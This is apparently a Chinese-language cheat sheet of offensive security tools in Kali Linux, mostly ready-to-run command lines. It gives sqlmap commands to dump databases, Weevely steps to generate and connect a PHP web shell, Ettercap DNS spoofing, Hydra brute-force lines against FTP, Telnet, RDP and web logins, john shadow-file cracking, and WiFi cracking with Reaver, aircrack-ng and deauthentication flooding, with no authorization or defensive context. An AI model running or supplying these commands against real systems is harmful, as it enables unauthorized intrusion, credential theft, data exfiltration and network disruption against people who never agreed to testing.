### nump ###
Nmap四种最基本扫描方式:TCP connect()端口扫描、TCP同步(SYN)端口扫描、UDP端口扫描、Ping扫描
namp –[sT] TCP扫描 –[sS]TCP同步扫描 –[sU] UDP扫描 –[sP] ping扫描 –[p] 扫描端口(0-100) –[O] 主机
### Nessus:登录>新建策略(添加所需插件程序)>新建扫描任务 ###
### OpenVAS:OPenVAS配置>新建Scan Config(扫描类型)>创建扫描目标>新建扫描任务 ###
OpenVAS图形界面:应用程序>KaliLinux>漏洞分析>OpenVAS>openvas-gsd命令
新建Scan Config:Configuration>Scan Configs>New Scan Config>设置扫描名称|Base|扫描内容
扫描类型:Brute force attacks|CISCO|Databases|FTP|Firewalls|Netware|RPC|SNMP
新建目标:Configuration>Targets>New Target>设置target名称|扫描的主机>Create Target
新建任务:Scan Management>New Task>设置任务名称|Scan Config|Scan Targets>Create Task>Start
扫描本地漏洞-扫描网络漏洞-扫描指定Linux系统漏洞-扫描指定Windows系统漏洞
### SQLMAP: 输入 输出 网络通信(发送接受数据)攻击模块(注入点探测 真正攻击模块) ###
创建配置文件:sqlsus -g [filename]>加入shell:sqlsus filename >注入测试:sqlsus> start
sqlmap-access/sqlmap-mysql/oracle/sqlserver:
sqlmap -u URL
sqlmap -u URL --dbs
sqlmap -u URL --tables -D Database_Name
sqlmap -u URL --columns -D Database_Name – T Table_Name
sqlmap -u URL --dump -D Database_Name -T Table_Name -C Column_Name
### Burpsuite:taget|proxy|spider|scanner|intruder|repeater|decoder ###
burpsuite安装配置:配置JDK>下载(wget http://burpsuite.jar)>执行(java -Xmx2g -jar burpsuite.jar)
扫目录-暴力破解网站后台-破解伪随机码rand(预测验证码漏洞)-半自动注入-上传突破-织梦本地包含利用-任意命令执行(当URI 数据为include()函数参数时,提交POST PHP命令执行)-突破安全狗提权-开裤渗透-绕过d盾继续注入-会话控制安全cookies/seesion
### Weevely ###
生成.php木马:weevely generate <password> [<path>] >上传木马:上传漏洞>连接后门&WebShell:weevely <url> <password>
### Ettercap ###
下载>解压>安装编译源码所需依赖库>编译>开始攻击:sudo ettercap -Tq -I <interface> -P dns_spoof
### SET ###
使用SET实施攻击:钓鱼性攻击向量-Web攻击向量-PowerShell攻击向量
### unshadow、john ###
创建用户密码:useradd <username> [-d <home_dir>] [-s <bash>] passwd <username>
收集密码密文:unshadow <passwd_file> <shadow_file> > <output_file>
尝试破解:john <pw.list>
### Hydra:FTP/HTTP/HTTPS/MySQL/MS SQL/Oracle/Cisco/IMAP/VNC密码破解 ###
启动Hydra:hydra-gtk >>设置目标地址、端口、协议 >>指定用户名和密码列表文件
ftp破解:hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典(/root/Desktop/pwd.txt) -e ns -vV
Telnet破解:hydra ip telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V
RDP破解(远程桌面协议):hydra ip rdp -l administrator -P pass.txt -V
Web登录破解(GET):hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
Web登录破解(POST):hydra -l admin -p pass.txt -o out.txt -f ip http-post-form “cookie”
### CDLinux破解Wifi:minidwep-gtk + Reaver跑PIN(路由器WPS)/EWSA跑字典(握手包) ###
reaver -i mon0 -b Mac地址 -c 9 -a -v -S -x 20 -r 100:10 -l 300
### KaliLinux破解Wifi : aircrack-ng ###
airmon-ng start wlan0 #启动网卡监听模式 ifconfig显示wlan0mon表示成功 #wlan0外置网卡/无线网卡
airodump-ng wlan0mon #扫描wifi信息,ctrl+c停止
BSSID(路由的MAC地址)、PWR(信号强度,越小信号越强)、#Data(传输的数据)
CH(信号频道,只有在一个频道才可进行下一步操作)、ESSID(wifi名称)
airodump-ng -c (频道) --bssid B0:D5:9D:84:39:1E -w /root wlan0mon #-c wifi所在频道 -w握手包目录
aireplay-ng -0 0 -a MAC地址 wlan0mon #deauth洪水攻击,取消目标路由和所有设备无线连接,设备会重新连接,抓取握手包
aircrack-ng -w /dic/wordlist.txt /root-xx.cap #字典破解 -w字典目录,root-xx.cap握手包